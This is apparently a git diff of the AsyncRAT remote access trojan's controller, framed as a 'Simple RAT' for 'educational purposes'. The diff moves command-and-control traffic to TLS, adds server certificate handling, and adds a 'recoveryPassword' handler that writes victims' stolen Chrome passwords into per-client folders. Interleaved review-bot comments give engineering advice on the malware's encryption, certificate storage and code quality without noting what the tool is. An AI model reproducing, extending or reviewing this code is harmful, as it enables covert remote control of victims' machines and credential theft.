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 + gg== + 
+ + \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs index 2a86717..758e9d8 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs @@ -12,6 +12,7 @@ using System.Threading; using System.IO; using System.Net.Sockets; using Timer = System.Threading.Timer; +using AsyncRAT_Sharp.Helper; namespace AsyncRAT_Sharp.Forms { @@ -55,14 +56,14 @@ namespace AsyncRAT_Sharp.Forms { try { - byte[] msg = Settings.AES.Encrypt((byte[])obj); + byte[] msg = (byte[])obj; byte[] buffersize = BitConverter.GetBytes(msg.Length); C.ClientSocket.Poll(-1, SelectMode.SelectWrite); Tick = new Timer(new TimerCallback(Timer3), null, 0, 1000); - C.ClientSocket.Send(buffersize); + C.ClientSslStream.Write(buffersize); + C.ClientSslStream.Flush(); int chunkSize = 50 * 1024; byte[] chunk = new byte[chunkSize]; - int SendPackage; using (MemoryStream buffereReader = new MemoryStream(msg)) { BinaryReader binaryReader = new BinaryReader(buffereReader); @@ -71,7 +72,8 @@ namespace AsyncRAT_Sharp.Forms { chunk = binaryReader.ReadBytes(chunkSize); bytesToRead -= chunkSize; - SendPackage = C.ClientSocket.Send(chunk); + C.ClientSslStream.Write(chunk); + C.ClientSslStream.Flush(); BytesSent += chunk.Length; } while (bytesToRead > 0); diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.Designer.cs index a171863..2d66640 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.Designer.cs 
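Review bot: In the `@@ -55,14` hunk of FormDownloadFile.cs the writes move to `C.ClientSslStream`, but the unchanged `C.ClientSocket.Poll(-1, SelectMode.SelectWrite)` above them still waits on the raw socket with no timeout, so the send path mixes two layers and can block indefinitely. With `Settings.AES.Encrypt` dropped from `msg`, confidentiality and integrity of the transfer rest entirely on that stream, and nothing visible checks `C.ClientSslStream.IsAuthenticated` before the length prefix is written. A comment such as `// payload is plaintext at this layer; protected only by ClientSslStream` would make the new trust boundary explicit, and the same applies to the chunk loop in the `@@ -71,7` hunk. For anyone analysing captures, the 4-byte length prefix and the 50 KiB chunks are from this commit on visible only after TLS decryption. The enclosing method starts and ends outside both hunks.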
@@ -32,8 +32,6 @@ this.textPorts = new System.Windows.Forms.TextBox(); this.label1 = new System.Windows.Forms.Label(); this.groupBox1 = new System.Windows.Forms.GroupBox(); - this.label2 = new System.Windows.Forms.Label(); - this.textPassword = new System.Windows.Forms.TextBox(); this.button1 = new System.Windows.Forms.Button(); this.groupBox1.SuspendLayout(); this.SuspendLayout(); @@ -56,36 +54,18 @@ // // groupBox1 // - this.groupBox1.Controls.Add(this.label2); - this.groupBox1.Controls.Add(this.textPassword); this.groupBox1.Controls.Add(this.label1); this.groupBox1.Controls.Add(this.textPorts); this.groupBox1.Location = new System.Drawing.Point(13, 13); this.groupBox1.Name = "groupBox1"; - this.groupBox1.Size = new System.Drawing.Size(558, 160); + this.groupBox1.Size = new System.Drawing.Size(558, 111); this.groupBox1.TabIndex = 2; this.groupBox1.TabStop = false; this.groupBox1.Text = "Settings"; // - // label2 - // - this.label2.AutoSize = true; - this.label2.Location = new System.Drawing.Point(6, 103); - this.label2.Name = "label2"; - this.label2.Size = new System.Drawing.Size(78, 20); - this.label2.TabIndex = 3; - this.label2.Text = "Password"; - // - // textPassword - // - this.textPassword.Location = new System.Drawing.Point(129, 100); - this.textPassword.Name = "textPassword"; - this.textPassword.Size = new System.Drawing.Size(423, 26); - this.textPassword.TabIndex = 2; - // // button1 // - this.button1.Location = new System.Drawing.Point(23, 203); + this.button1.Location = new System.Drawing.Point(23, 146); this.button1.Name = "button1"; this.button1.Size = new System.Drawing.Size(542, 50); this.button1.TabIndex = 0; 
@@ -97,7 +77,7 @@ // this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; - this.ClientSize = new System.Drawing.Size(583, 265); + this.ClientSize = new System.Drawing.Size(583, 226); this.Controls.Add(this.button1); this.Controls.Add(this.groupBox1); this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon"))); @@ -118,9 +98,7 @@ #endregion private System.Windows.Forms.Label label1; private System.Windows.Forms.GroupBox groupBox1; - private System.Windows.Forms.Label label2; private System.Windows.Forms.Button button1; public System.Windows.Forms.TextBox textPorts; - public System.Windows.Forms.TextBox textPassword; } } \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.cs index fa473bc..0390c82 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.cs @@ -2,6 +2,9 @@ using System.Windows.Forms; using System.IO; using System.Diagnostics; +using AsyncRAT_Sharp.Helper; +using System.Security.Cryptography.X509Certificates; + namespace AsyncRAT_Sharp.Forms { public partial class FormPorts : Form 
@@ -15,24 +18,32 @@ namespace AsyncRAT_Sharp.Forms private void PortsFrm_Load(object sender, EventArgs e) { - Methods.FadeIn(this, 5); + Methods.FadeIn(this, 5); textPorts.Text = "6606, 7707, 8808"; if (Properties.Settings.Default.Ports.Length > 0) textPorts.Text = Properties.Settings.Default.Ports; - if (Properties.Settings.Default.Password.Length > 0) - textPassword.Text = Properties.Settings.Default.Password; - this.Text = $"{Settings.Version} | Welcome {Environment.UserName}"; + + if (!File.Exists(Settings.CertificatePath)) + { + using (FormCertificate formCertificate = new FormCertificate()) + { + formCertificate.ShowDialog(); + } + } + else + { + Settings.ServerCertificate = new X509Certificate2(Settings.CertificatePath); + } } private void button1_Click(object sender, EventArgs e) { - if (textPorts.Text.Length > 0 && textPassword.Text.Length > 0) + if (textPorts.Text.Length > 0) { Properties.Settings.Default.Ports = textPorts.Text; - Properties.Settings.Default.Password = textPassword.Text; Properties.Settings.Default.Save(); isOK = true; this.Close(); diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs index a9970bf..c61b3c7 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs @@ -7,6 +7,7 @@ using System.IO; using System.Windows.Forms; using System.Threading; using System.Threading.Tasks; +using AsyncRAT_Sharp.Helper; namespace AsyncRAT_Sharp.Handle_Packet { diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs index b366eb2..2e4451c 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs 
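Review bot: `new X509Certificate2(Settings.CertificatePath)` in `PortsFrm_Load` uses the single-argument constructor, so the PKCS#12 file can only be one stored without a password, and the server's private key sits unprotected on disk at that path. The load is also unguarded: a corrupt or unreadable file throws out of the Load handler. Nothing in this hunk confirms that `Settings.ServerCertificate` was set after the `FormCertificate` dialog returns; FormCertificate is outside this hunk, so that may be handled there. I would at least document the storage assumption above the `else` branch: `// PKCS#12 is loaded without a password; the private key is unprotected at Settings.CertificatePath`. For anyone examining a host, that file is the artifact that carries this server's TLS identity.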
@@ -1,4 +1,5 @@ using AsyncRAT_Sharp.Forms; +using AsyncRAT_Sharp.Helper; using AsyncRAT_Sharp.MessagePack; using AsyncRAT_Sharp.Sockets; using System; diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs index dc12d1c..1035d6c 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs @@ -5,6 +5,8 @@ using System.Diagnostics; using System.Drawing; using AsyncRAT_Sharp.Forms; using System.Security.Cryptography; +using System.IO; +using System.Windows.Forms; namespace AsyncRAT_Sharp.Handle_Packet { @@ -19,7 +21,7 @@ namespace AsyncRAT_Sharp.Handle_Packet byte[] data = (byte[])array[0]; client = (Clients)array[1]; MsgPack unpack_msgpack = new MsgPack(); - unpack_msgpack.DecodeFromBytes(Settings.AES.Decrypt(data)); + unpack_msgpack.DecodeFromBytes(data); switch (unpack_msgpack.ForcePathObject("Packet").AsString) { case "ClientInfo": @@ -58,6 +60,15 @@ namespace AsyncRAT_Sharp.Handle_Packet break; } + case "recoveryPassword": + { + if (!Directory.Exists(Path.Combine(Application.StartupPath, "ClientsFolder\\" + client.ID))) + Directory.CreateDirectory(Path.Combine(Application.StartupPath, "ClientsFolder\\" + client.ID)); + File.WriteAllText(Path.Combine(Application.StartupPath, "ClientsFolder\\" + client.ID + "\\ChromePassowrds.txt"), unpack_msgpack.ForcePathObject("Password").AsString); + new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} recovered passwords successfully", Color.Purple); + break; + } + case "Received": { new HandleListView().Received(client); 
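Review bot: With `Settings.AES.Decrypt` removed from `unpack_msgpack.DecodeFromBytes(data)` in the `@@ -19,7 +21,7 @@` hunk, the `catch (CryptographicException)` handler further down Packet.cs (context in the `@@ -99,7 +110,7 @@` hunk) appears to be stale. Nothing visible in the try body performs a cryptographic operation any more, so its "tried to connect with wrong password" log line no longer describes a reachable condition. The shared password was the only peer check at this layer, and the received bytes now go straight into the MessagePack decoder. I would drop the handler, or reword it and note the change where decoding happens: `// payload is no longer AES-wrapped; peer authentication is whatever the TLS layer provides`. The method body starts and ends outside these hunks, so other throw sites may exist.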
@@ -99,7 +110,7 @@ namespace AsyncRAT_Sharp.Handle_Packet catch (CryptographicException) { new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} tried to connect with wrong password", Color.Red); - // Settings.Blocked.Add(client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]); + // Settings.Blocked.Add(client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]); client.Disconnected(); return; } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs index cd61575..1459f4c 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs @@ -1,11 +1,13 @@ using System; +using System.Text; using System.Threading.Tasks; using System.Windows.Forms; -namespace AsyncRAT_Sharp +namespace AsyncRAT_Sharp.Helper { - static class Methods + public static class Methods { + private const string Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; public static string BytesToString(long byteCount) { string[] suf = { "B", "KB", "MB", "GB", "TB", "PB", "EB" }; @@ -25,5 +27,15 @@ namespace AsyncRAT_Sharp o.Opacity += 0.05; } } + + public static Random Random = new Random(); + public static string GetRandomString(int length) + { + StringBuilder randomName = new StringBuilder(length); + for (int i = 0; i < length; i++) + randomName.Append(Alphabet[Random.Next(Alphabet.Length)]); + + return randomName.ToString(); + } } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Program.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Program.cs index 1dec6ce..9dee0cd 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Program.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Program.cs 
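Review bot: `public static Random Random = new Random();` in Methods.cs exposes a mutable, shared `System.Random` whose instance methods are not thread-safe, and `GetRandomString` calls it without a lock. `System.Random` output is also predictable, so these strings are unsuitable wherever a caller needs an unguessable value; the callers are outside this hunk, so whether that matters cannot be told from here. If nothing outside `Methods` touches the field, declare it `private static readonly Random Random = new Random();`, guard the `Random.Next` call with a lock, and state the limitation on the method: `// not cryptographically random; do not use for secrets`.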
@@ -4,6 +4,18 @@ using System.Linq; using System.Threading.Tasks; using System.Windows.Forms; +// │ Author : NYAN CAT +// │ Name : AsyncRAT // Simple RAT + +// Contact Me : https://github.com/NYAN-x-CAT + +// This program Is distributed for educational purposes only. + +// Credits; +// Serialization @ymofen +// StreamLibrary @Dergan +// Special Thanks MaxXor@hf gigajew@hf + namespace AsyncRAT_Sharp { static class Program diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs index 256d970..5d999e5 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs @@ -174,6 +174,16 @@ namespace AsyncRAT_Sharp.Properties { } } + /// + /// Looks up a localized resource of type System.Drawing.Bitmap. + /// + internal static System.Drawing.Bitmap key { + get { + object obj = ResourceManager.GetObject("key", resourceCulture); + return ((System.Drawing.Bitmap)(obj)); + } + } + /// /// Looks up a localized resource of type System.Drawing.Bitmap. /// diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx index 48843c2..9d39e4c 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx @@ -154,6 +154,9 @@ ..\Resources\filemanager.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + ..\Resources\remotedesktop.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 
